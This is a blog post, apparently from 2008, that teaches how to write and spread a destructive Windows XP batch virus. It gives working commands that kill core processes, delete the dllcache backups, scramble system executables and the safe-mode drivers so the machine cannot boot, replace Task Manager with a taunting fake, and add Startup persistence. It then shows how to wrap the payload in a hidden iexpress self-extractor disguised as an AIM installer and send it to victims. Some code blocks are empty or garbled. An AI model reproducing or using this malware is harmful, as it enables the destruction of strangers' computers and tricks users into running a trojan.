Center of Reverse Engineering™

Now to begin we must first ask our selfs questions... How can i cause harm to a computer so the target will not be able to get back to windows and will not be able to boot from safe mode, not only that, but delete our tracks and make the changes to the system so confusing and irreversible that the only way to save it is simply to reformat...well i covered all those fields for you guys.

Now what a batch file is?

well to me a batch file is simply A computer file containing a series of related program commands that instruct a computer to perform a series of tasks

What kind of commands to i need to know?

the commands your going to need to know is simple DOS commands (correct me if im wrong please ^^) and CMD commands,to see all Batch commands go to run,and type in Command.com then type help.

OK! how do i get started?

ok you will first want to open up note pad (start>run>notepad) once there we want to start our batch file with the command:

Code:

@echo off

this commands simply states the start of our batch file and to "hide" our commands and hides the directory of the batch,let's say the batch is on the desktop,when you run it,it will show C:\document...\Desktop\batchname.
so now that we've got our starting command lets do some research =)

if we our selves delete system file in the system32 file at random...they will magically appear as if nothing happens...hmm thats strange..why does it keep re appearing? well turns out the windows is one sneaky bastard and keeps copys of its system32 and other value-able files in the ole magical hidden:
C:\WINDOWS\system32\dllcache\
yes... this is where the back-ups are stored...if we delete these then the ones in system32 will not re-appear and thus now we can manipulate these files any way we want as long as we delete the backups =) so now i will continue on with my code...

Code:

I put tskill because winlogon/explorer/taskmgr may be running,so it's better to just disable them

as you have seen here, these are all vital processes for windows to start... and now that we've removed the original copies..we have gotten the upper hand now so whats next? the PREVENTION.

the way this batch file is going to work properly is if we can somehow disable the task manager..hmm ok we can just delete tasmgr.exe from system32 and it will never work..butt i love being sinister,evil, and most of all sexy so what i am going to do is make a new batch file with the following code:

Code:

@echo off msg * oh yea baby press them buttons like you have never pressed them before lol hahaha

Having that done we want to convert it in to an .exe with the name taskmgr..so your output should be taskmgr.exe (google the converter) !GASP! now this is going to be our haha you know your ******* screwed punch line, for those of you who havent catched up..were basicly gonna replace the real taskmgr.exe with our fake one thus every time they press CTRL+ALT+DELETE they will get our lovely/scary message.
Now back to our original batch file we now are going to set the command to copy
so our code will look like this (the copy command is simple..it just copies)

The dirty message ( the .exe ) has to be inside the same folder as this batch,or it will not work

Code:

Now that we have the prevention from pressing control alt delete.. we now need to add the CONFUSION this technique is used to confuse the smart tech guys over at your nearest computer shop on what is going on.

We are going to rename all the system files into each other..so for example when winlogon.exe wants to load, explorer.exe loads instead and so on.

Code:

This my friends, will make the computer go nuts, now that we have that..i don't want my user to even try and use safe mode and turns out..GASP! safe mode needs to load two very special .sys files named mup.sys and vga.sys which im guessing its for video..anywho we are going to want to delete those from the cache and rename them, becareful though, they are not located in system32.

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.e xe
del %systemdrive%\windows\System32\dllcache\explorer.e xe
del %systemdrive%\windows\System32\dllcache\services.e xe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.ex e
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys

(Note:Ren also works)

Ok now we must force the user to shutdown..but remember to give the system enough time to replace these files so lets add the shutdown command
which shutdown your computer (-t means time and -c means comment)

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10

Now the user has 10 seconds before complete system shutdown..now if you change those system files...we are going to get a pop up saying to locate your windows xp cd because valueble files have been replaced..haha heres a challange run this program on your computer and look for your windows xp copy/insert it/ and let it load in 15 seconds hahahaha good luck specially when your cought off guard =P.

Ok now we're still gonna add even more goodies to this batch..we are going to fork it..yes youve heard me..fork is when the applicationopens and application which opens the application while the others open applications..so basicly you stupify the computer with cmd pop ups sp no we use the echo command to bring out what we want the users to see.

Code:

Ok now we have them what we want the to see... NOW we are going to make it repeat it by trying to open this very same file again by using label. a label is basicly a bookmark in your book, it lets you go back to that specific place. so a label looks like this-

Code:

:start

":" is label and "start" is the name (it can be anything).

Code:

So finally

Code:

Notice i put a directory there..hmm and its a start up too...wow i must be thinking something

now were gonna save this as virus.bat and make another simple batch file with the code-

Code:

@echo off
copy "virus.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
start virus.exe

And save it as move.bat

as you can see this will only start what we just made and move it to start ups =) so if they fix the problem ( by sheer luck) and turn the comp back on with this file still in start up..they will be surprised =).. now we are going to turn these files into .exe with the converter (bat to exe;google it). we are going to choose move.bat and click compile. and then do the same for virus.bat, after this you should end up with a move.exe and a virus.exe. now how in the world are we going to include the task manager we made into our file..hmmmm OH! windows has its own packalotofevilexe program =) go to start run then type iexpress
!GASP!!

Now create a new self extraction then click next
Select extract and install (the first choice Buzzo) then next
Give it a good looking tiltle like...Install_AIM then next
Then no promt then next
No license..next
Ah now we add our move.exe, virus.exe and taskmgr.exe in to this wonderful white box And click next
On the box that says install program select move.exe then next, we don't need anything for the bottom
Select hidden then next
No message, next
Now check hide process animation from user and click browse to save it and give it a good Name like above..something beleive able like Installer_AIM.exe
No restart, next
Don't save if you do then save i don't care, next
Then create and your Installer_AIM.exe will be created.. NOW! look at the fugly icon..
Use my icon changer and look for an AIM icon or something to make it beleive able, my icon changer is pretty self explanatory (and not..its really not mine) so i don't feel like getting into the icon changer since even a stupid one can do it. your .exe is now alive and kicking so send it to your nearest myspace user.

Center of Reverse Engineering™

We have moved to http://access-xperia.blogspot.com

Thursday, October 16, 2008

Wicked BATCH VIRUSES Tutorials

related posts:

0 comments:

Post a Comment

Translator

Sponsors

Followers

Copyright

Related Sites

My BlogLog

Blog Archive

GeoStats

Featured

Popular